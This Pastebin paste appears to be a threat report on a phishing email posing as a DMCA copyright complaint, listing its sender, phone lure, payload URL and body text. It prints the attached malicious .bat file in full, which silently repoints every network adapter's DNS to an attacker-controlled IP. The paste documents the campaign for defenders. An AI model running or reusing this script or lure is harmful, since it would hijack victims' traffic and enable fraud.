Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT ATTRIBUTION: STOLEN IMAGES / UNKNOWN
- The Email had an attached .bat file
- SUBJECTS OBSERVED
- Contact your provider's technical support immediately 1 (877) 5471-430 .Copyright infringement complaint
- SENDERS OBSERVED
- support@dn7.ir
- STOLEN IMAGES PAYLOAD URL
- https://fvcalw.de/dirwp.php
- EMAIL BODY
- Technical department for dealing with complaints of copyright holders
- 1 (877) 5471-430
- Contact your provider's technical support immediately
- We always respond to copyright infringement notices. Content posted from your device violates the US Digital Millennium Copyright Act (DMCA)
- Call is free for us residents
- Read the full text of the complaint
- About
- Technical Department
- Contact Info
- 203 St. Mountain View, San Francisco, California, USA
- 1 (877) 5471-430
- Useful Links
- 1 (877) 5471-430
- Useful Links
- © 2021 Stories. All Rights Reserved
- Cancel Subscription
- SUPPORTING EVIDENCE
- The attached .bat file contents:
- @ECHO OFF
- SETLOCAL EnableDelayedExpansion
- :ETHERNET
- SET adapterName=
- FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "ETHERNET ADAPTER"') DO (
- SET adapterName=%%a
- REM Removes "Ethernet adapter" from the front of the adapter name
- SET adapterName=!adapterName:~17!
- REM Removes the colon from the end of the adapter name
- SET adapterName=!adapterName:~0,-1!
- rem ECHO !adapterName!
- netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
- netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
- timeout /t 2
- netsh interface set interface "!adapterName!" DISABLED
- timeout /t 2
- netsh interface set interface "!adapterName!" ENABLED
- rem netsh interface ipv4 add dns name="!adapterName!" 192.168.0.3 index=2
- )
- :WIRELESS
- FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "WIRELESS LAN ADAPTER"') DO (
- SET adapterName=%%a
- REM Removes "Wireless LAN adapter" from the front of the adapter name
- SET adapterName=!adapterName:~21!
- REM Removes the colon from the end of the adapter name
- SET adapterName=!adapterName:~0,-1!
- rem ECHO !adapterName!
- netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
- netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
- timeout /t 2
- netsh interface set interface "!adapterName!" DISABLED
- timeout /t 2
- netsh interface set interface "!adapterName!" ENABLED
- )
- ipconfig /flushdns
- :EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement